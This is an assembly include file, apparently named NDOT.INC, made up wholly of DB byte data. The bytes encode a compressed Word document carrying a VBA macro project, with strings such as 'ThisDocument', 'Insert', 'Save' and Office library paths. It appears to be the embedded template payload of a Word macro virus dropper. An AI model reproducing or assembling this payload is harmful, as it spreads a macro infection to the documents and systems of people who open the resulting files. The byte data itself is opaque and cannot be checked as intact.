DB 075H,052H,014H,065H,052H,0B8H,074H,000H,00AH,000H,032H,033H,036H,064H,064H
DB 061H,008H,06FH,032H,031H,039H,092H,024H,02AH,044H,001H,011H,002H,099H,0F3H
DB 04CH,004H,040H,002H,0A9H,000H,0F3H,01AH,005H,064H,001H,0FEH,0FFH,001H,0B3H
DB 0E3H,005H,00CH,00FH,006H,00FH,010H,00FH,010H,002H,0E4H,002H,04DH,00FH,016H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH
DB 0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,01FH,000H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,003H,010H
DB 0A3H,098H,0C6H,077H,092H,0D1H,0D2H,011H,0BCH,0A4H,044H,0BCH,006H,045H,053H
DB 082H,093H,003H,014H,023H,078H,003H,008H,060H,022H,036H,080H,002H,004H,043H
DB 01CH,01DH,000H,0FFH,000H,020H,000H,000H,028H,000H,000H,004H,004H,057H,06FH
DB 072H,064H,0B5H,06BH,010H,000H,003H,004H,056H,000H,080H,042H,041H,0F7H,0E2H
DB 010H,000H,005H,004H,057H,069H,06EH,031H,036H,0C1H,07EH,006H,00BH,010H,000H
DB 033H,032H,007H,07FH,003H,01FH,04DH,061H,063H,0B3H,0B2H,010H,000H,008H,004H
DB 050H,072H,001H,000H,0C2H,054H,074H,06FH,031H,03AH,071H,010H,000H,006H,004H
DB 073H,074H,064H,06FH,06CH,065H,000H,000H,093H,060H,010H,000H,007H,000H,04DH
DB 053H,046H,06FH,072H,06DH,073H,043H,00FH,010H,028H,010H,000H,00CH,004H,0D2H
DB 07FH,073H,0D6H,07EH,074H,03CH,09EH,010H,000H,009H,002H,07CH,0FFH,003H,004H
DB 080H,004H,000H,05FH,045H,076H,061H,06CH,075H,0D2H,02DH,018H,0D9H,003H,040H
DB 04FH,066H,066H,069H,063H,000H,043H,065H,015H,075H,010H,000H,00FH,004H,054H
DB 0D6H,047H,004H,062H,063H,074H,081H,045H,002H,055H,004H,084H,045H,04DH,0F3H
DB 0C2H,099H,06FH,031H,0D4H,012H,003H,07CH,0D3H,045H,045H,0D2H,044H,0ECH,09CH
DB 010H,002H,0BCH,065H,001H,0E3H,0D2H,042H,051H,05BH,010H,000H,00BH,000H,041H
DB 0D6H,03BH,0D2H,03AH,0A5H,02AH,010H,0F2H,0AEH,0D2H,03FH,0D2H,092H,009H,018H
DB 0D6H,03FH,0F4H,0F6H,002H,05EH,000H,045H,06EH,061H,062H,06CH,065H,0D2H,040H
DB 0D5H,03FH,0EAH,0F3H,010H,019H,000H,032H,061H,077H,064H,002H,02AH,003H,018H
DB 064H,0FCH,0D3H,010H,000H,001H,000H,069H,060H,010H,010H,038H,00DH,000H,00EH
DB 000H,0D2H,045H,0D2H,044H,007H,090H,071H,0ACH,002H,0BFH,000H,0D2H,04FH,003H
DB 0FAH,063H,074H,04FH,068H,00BH,094H,002H,0E0H,002H,00FH,043H,0D4H,053H,065H
DB 06EH,074H,073H,00AH,027H,012H,02DH,000H,0D4H,058H,030H,076H,003H,057H,0C8H
DB 024H,043H,06FH,064H,0D6H,052H,0E1H,01CH,003H,01BH,0D4H,056H,0BAH,0CEH,002H
DB 0F1H,000H,049H,0D2H,088H,072H,074H,004H,06CH,069H,0C5H,002H,0C1H,000H,053H
DB 061H,076H,065H,092H,0D0H,003H,0D9H,017H,02AH,06AH,002H,086H,032H,0E5H,001H
DB 0F6H,0BBH,001H,012H,0BDH,0E2H,095H,004H,042H,03AH,047H,08EH,013H,0C4H,005H
DB 004H,0A2H,01FH,002H,018H,002H,03FH,0B4H,005H,01DH,006H,006H,00CH,002H,01FH
DB 0A0H,0B6H,0FFH,0FFH,00EH,002H,003H,002H,02AH,011H,002H,02AH,00CH,002H,008H
DB 003H,01BH,00CH,002H,0DEH,0D3H,046H,012H,024H,00AH,003H,003H,00FH,005H,0D5H
DB 0A4H,001H,080H,0B2H,080H,001H,000H,0D2H,079H,012H,011H,030H,02AH,002H,002H
DB 090H,009H,000H,000H,000H,070H,014H,006H,048H,003H,000H,082H,002H,000H,064H
DB 0E4H,004H,004H,000H,00FH,038H,000H,000H,01CH,000H,017H,01DH,0F2H,01BH,022H
DB 010H,063H,074H,005H,051H,000H,048H,000H,000H,040H,002H,000H,000H,00AH,006H
DB 002H,00AH,03DH,0ADH,002H,00AH,007H,002H,07CH,001H,014H,008H,006H,012H,080H
DB 000H,009H,002H,012H,080H,019H,0A2H,0DDH,0F2H,0CBH,00CH,002H,04AH,012H,03CH
DB 002H,00AH,016H,028H,02CH,000H,001H,039H,022H,036H,010H,022H,037H,03EH,002H
DB 019H,073H,092H,0EAH,092H,09BH,06FH,0C2H,0D5H,065H,050H,084H,082H,000H,00DH
DB 052H,0D2H,025H,05CH,000H,003H,062H,0BCH,047H,0F5H,0A6H,0B0H,034H,033H,030H
DB 02DH,022H,076H,000H,002H,004H,043H,000H,00AH,003H,002H,00EH,001H,012H,0F4H
DB 0A5H,023H,000H,032H,02EH,030H,023H,000H,010H,030H,023H,043H,03AH,000H,05CH
DB 057H,049H,04EH,044H,04FH,057H,092H,036H,053H,059H,053H,008H,000H,054H,045H
DB 04DH,082H,077H,054H,044H,04FH,04CH,045H,032H,02EH,010H,054H,04CH,042H,023H
DB 094H,000H,000H,008H,0F2H,07AH,000H,0F2H,08BH,061H,074H,022H,01DH,023H,000H
DB 02FH,000H,001H,016H,000H,007H,040H,020H,080H,002H,04DH,053H,000H,046H,023H
DB 0ADH,03EH,000H,00EH,021H,001H,006H,084H,09BH,045H,072H,004H,000H,000H,080H
DB 083H,09BH,02FH,000H,07AH,080H,009H,006H,070H,080H,001H,001H,046H,041H,046H
DB 000H,000H,035H,031H,034H,000H,031H,036H,032H,02DH,042H,038H,035H,033H,010H
DB 02DH,031H,031H,00AH,000H,044H,0F2H,04CH,039H,092H,01BH,034H,034H,034H,035H
DB 035H,033H,035H,00EH,034H,001H,048H,017H,000H,000H,046H,004H,033H,02EH,054H
DB 057H,044H,000H,023H,04DH,069H,063H,072H,06FH,073H,06FH,000H,000H,028H,066H
DB 074H,020H,002H,03DH,020H,000H,060H,020H,04FH,002H,062H,001H,0B0H,020H,000H
DB 001H,04CH,069H,062H,072H,061H,01CH,072H,079H,062H,0CBH,001H,01EH,050H,030H
DB 000H,090H,00DH,008H,000H,000H,013H,072H,002H,05FH,050H,033H,043H,032H,044H
DB 000H,044H,046H,038H,032H,02DH,043H,000H,000H,046H,045H,032H,037H,005H,050H
DB 041H,034H,01DH,050H,080H,04AH,050H,05CH,090H,056H,000H,00AH,042H,045H,05CH
DB 085H,028H,045H,058H,0A7H,028H,078H,0DCH,000H,077H,0DDH,083H,081H,095H,043H
DB 004H,002H,078H,04FH,033H,038H,044H,078H,082H,04FH,040H,075H,0B4H,015H,042H
DB 078H,02AH,098H,0C0H,02BH,080H,040H,08EH,0C4H,02CH,032H,000H,02CH,044H,0A2H
DB 0A5H,043H,02DH,035H,042H,046H,041H,092H,0D6H,030H,000H,000H,031H,042H,02DH
DB 042H,044H,045H,052H,035H,040H,078H,041H,041H,040H,077H,034H,0C0H,000H,000H
DB 002H,032H,001H,008H,055H,041H,052H,051H,055H,049H,056H,04FH,000H,053H,020H
DB 044H,000H,020H,045H,020H,050H,052H,04FH,000H,047H,052H,041H,04DH,041H,053H
DB 05CH,072H,0A3H,043H,052H,000H,000H,04FH,053H,04FH,046H,054H,000H,020H,04FH
DB 046H,046H,049H,043H,045H,05CH,001H,084H,000H,000H,001H,04DH,053H,04FH,039H
DB 037H,02EH,044H,00CH,04CH,04CH,048H,05CH,083H,025H,020H,000H,000H,038H,02EH
DB 030H,045H,092H,05CH,00FH,082H,0BFH,001H,000H,013H,0C2H,001H,08DH,004H,010H
DB 004H,09AH,019H,042H,0A8H,034H,0EFH,000H,06FH,063H,075H,06DH,032H,011H,01AH
DB 011H,04EH,004H,032H,000H,004H,000H,018H,040H,033H,054H,000H,068H,011H,040H
DB 038H,062H,0DAH,080H,08FH,063H,000H,075H,008H,002H,051H,000H,090H,062H,0D9H
DB 040H,0B6H,01CH,0C0H,006H,062H,0F4H,048H,042H,001H,031H,0C2H,0C4H,000H,000H
DB 0EBH,000H,0DCH,01EH,08BH,042H,002H,001H,005H,02CH,042H,01AH,08FH,09AH,022H
DB 042H,000H,009H,008H,00AH,02BH,042H,001H,010H,042H,001H,025H,08AH,01AH,0E1H
DB 02FH,0A2H,03EH,000H,003H,000H,0B0H,0C6H,0FEH,0FFH,009H,000H,0D3H,020H,007H
DB 01CH,001H,002H,009H,021H,002H,004H,004H,003H,010H,000H,000H,004H,08CH,006H
DB 08BH,07FH,000H,002H,069H,07FH,05DH,002H,084H,023H,075H,002H,02EH,00FH,049H
DB 006H,049H,049H,044H,03DH,022H,07BH,037H,037H,043H,036H,000H,086H,039H,038H
DB 041H,046H,02DH,044H,031H,039H,032H,013H,0F9H,022H,004H,043H,041H,034H,02DH
DB 016H,0F9H,084H,062H,034H,030H,002H,001H,07DH,022H,00DH,00AH,037H,0BAH,03DH
DB 00BH,076H,02FH,026H,048H,002H,01FH,004H,003H,00DH,080H,003H,00AH,04EH,061H
DB 06DH,065H,03DH,022H,037H,030H,046H,0DDH,002H,03AH,048H,065H,06CH,070H,043H
DB 06FH,0A0H,000H,06EH,074H,065H,078H,074H,003H,072H,030H,002H,013H,043H,04DH
DB 047H,03DH,022H,042H,038H,042H,080H,001H,041H,032H,037H,035H,044H,032H,042H
DB 00BH,004H,002H,01EH,044H,050H,042H,03DH,022H,037H,030H,000H,003H,037H,032H
DB 045H,046H,031H,030H,046H,030H,005H,004H,002H,018H,047H,043H,03DH,022H,032H
DB 038H,000H,009H,032H,041H,042H,037H,043H,038H,042H,038H,003H,004H,033H,037H
DB 002H,017H,00DH,00AH,05BH,048H,000H,000H,06FH,073H,074H,020H,045H,078H,074H
DB 065H,06EH,064H,065H,072H,020H,049H,06EH,066H,010H,000H,06FH,05DH,00DH,00AH
DB 008H,09CH,031H,03DH,07BH,033H,038H,033H,032H,044H,036H,034H,030H,009H,000H
DB 022H,081H,039H,030H,002H,0E6H,043H,046H,02DH,038H,045H,034H,033H,02DH,030H
DB 030H,041H,030H,000H,014H,043H,039H,031H,031H,030H,030H,035H,041H,07DH,03BH
DB 022H,08EH,03BH,008H,036H,030H,00DH,00AH,003H,083H,002H,05AH,062H,038H,06BH
DB 073H,070H,061H,063H,065H,002H,051H,00BH,0FAH,03DH,032H,037H,02CH,020H,003H
DB 004H,000H,0E0H,036H,032H,033H,02CH,020H,033H,037H,035H,02CH,020H,05AH,00DH
DB 00AH,01FH,0CEH,012H,07CH,004H,003H,0A3H,091H,01FH,0CEH,003H,015H,001H,000H
DB 001H,012H,0E2H,003H,0E2H,0FDH,043H,0B0H,006H,009H,002H,003H,015H,000H,0C0H
DB 004H,006H,018H,044H,000H,046H,01DH,002H,008H,017H,073H,06FH,020H,064H,06FH
DB 020H,036H,074H,066H,074H,020H,002H,093H,064H,0BCH,02AH,020H,000H,002H,038H
DB 062H,089H,003H,00CH,002H,027H,000H,022H,00EH,000H,003H,00CH,02EH,002H,00DH
DB 075H,023H,09BH,02EH,038H,0E0H,0FFH,000H,0F4H,039H,0B2H,071H,002H,046H,008H
DB 003H,00FH,09DH,056H,02AH,003H,07EH,00FH,004H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,0BFH,082H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,005H,010H,001H,0B2H,0E6H,06FH,0A2H,046H,070H,000H,04FH,000H,062H,0E2H
DB 0E8H,0EFH,0D7H,008H,0EAH,00FH,009H,00FH,010H,006H,010H,012H,0B2H,012H,005H
DB 04AH,005H,006H,006H,017H,00FH,007H,00CH,010H,05BH,002H,00EH,06FH,002H,004H
DB 00FH,003H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,007H,010H,005H,07AH,005H
DB 006H,007H,014H,00FH,008H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00BH,010H,005H,07AH,005H,006H,0FFH,01FH,00BH,018H,00FH,00CH,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,007H,010H,005H,07AH,005H,006H,007H,014H
DB 00FH,008H,00FH,010H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
;----------------------------------(NDOT.INC)---------------------------------